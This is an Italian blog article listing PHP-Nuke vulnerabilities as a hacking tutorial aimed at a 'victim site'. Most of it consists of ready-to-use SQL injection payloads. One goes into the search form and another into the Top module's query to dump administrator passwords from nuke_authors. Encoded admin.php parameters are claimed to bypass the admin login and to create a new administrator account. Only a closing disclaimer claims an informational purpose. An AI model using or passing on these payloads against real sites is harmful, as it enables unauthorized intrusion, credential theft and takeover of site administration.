Il PHP è un linguaggio di programmazione ampiamente utilizzato per gestire i numerosi servizi dei siti web e di altri servizi online; nel corso degli anni si è articolato in numerosi modi e oggi andremo ad analizzare il PHP-Nuke; di che cosa si tratta? Il PHP-Nuke lo individuiamo nel campo dei CMS, ovvero “Content Management System”; in parole più semplici, è un sistema che permette la creazione di portali dinamici, sempre basati su linguaggio PHP, su un database di tipo MySQL. Noi ci andremo ad occupare in questo articolo delle numerose vulnerabilità che possono insorgere nel PHP-Nuke. Andiamole ad elencare, una per una.

  1. Modulo “cerca”

Rechiamoci nella sezione del sito dove compare la funziona “cerca”, che permette appunto di cercare all’interno dello stesso sito un determinato argomento che ci interessa; dopodiché scriviamo in questo modulo

p0hh0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*

Se funziona, ci troveremo loggati automaticamente come amministratori

  1. Script nella query

In questo contesto, possiamo agire semplicemente inserendo nella query questo script (tutto attaccato)

https://www.sitovittima.it/phpNuke/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors

Oramai questa falla affligge pochi siti, ma tentare è di sicuro la strategia migliore per arrivare poco a poco ad un risultato. Se va tutto a buon fine, saremo in Root come amministratori.

  1. Esecuzione codice SQL

Un ultimo metodo consiste ad eseguire, sempre nella query, uno script di comandi SQL; possiamo quindi inserire

https://www.sitovittima.it/admin.php?foo=bar&admin=eCcgT1IvKjp5

Se questo codice ci porta ad una scritta “Selection from the database failed!”, allora siamo riusciti ad entrare come admin nel sito;

Con la sequenza https://www.sitovittima.it/admin.php?op=AddAuthor=0VMRUNUIDEvKjox possiamo invece ottenere un nuovo user con privilegi da amministratore con Nick “badangel” e Pass “top-secret”; se volete invece Nick e Pass tutte vostre bisogna semplicemente agire sui valori add_aid per il Nick e add_pwd per la Password.

Ricordiamo che ne Io ne la Redazione di StartAndGo ci assumiamo la responsabilità di eventuali usi scorretti che farete di quest’articolo; tutto ciò è stato creato solamente e unicamente a scopo informativo e non è da intendersi come incitazione nel compiere azioni illegali di pirateria informatica, punibile dalla legge.